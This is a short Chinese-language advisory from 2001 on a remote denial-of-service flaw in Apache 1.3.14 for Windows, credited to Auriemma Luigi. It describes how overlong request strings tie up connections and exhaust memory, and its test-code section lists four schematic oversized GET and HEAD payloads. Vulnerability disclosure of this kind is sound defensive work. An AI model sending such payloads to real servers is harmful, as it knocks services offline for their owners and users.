对Apache Win32发送超长字符串可导致拒绝服务攻击发布时间:2001-04-14 更新时间:2001-03-14 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Apache WebServer 1.3.14-win98se,win2ksp1详细描述 对服务器发送: (http command) <space> string 0d 0a的命令(最后 两个字节是0d 0a),APACHE会返回错误给管理员,并百连接置于连接 闲置状态,如果我们发送100个这样的连接,就可以导致服务器内存 耗竭。 测试代码 1) GET (8184 of "/") / 2) HEAD /(8182 of "A") / 3) GET (8184 of "/") / for 100 times: Accept: (8182 of "/") 4) GET (8177 of "/") HTTP/1.0 解决方案 尚无 相关信息 Auriemma Luigi <kaino3@genie.it> |
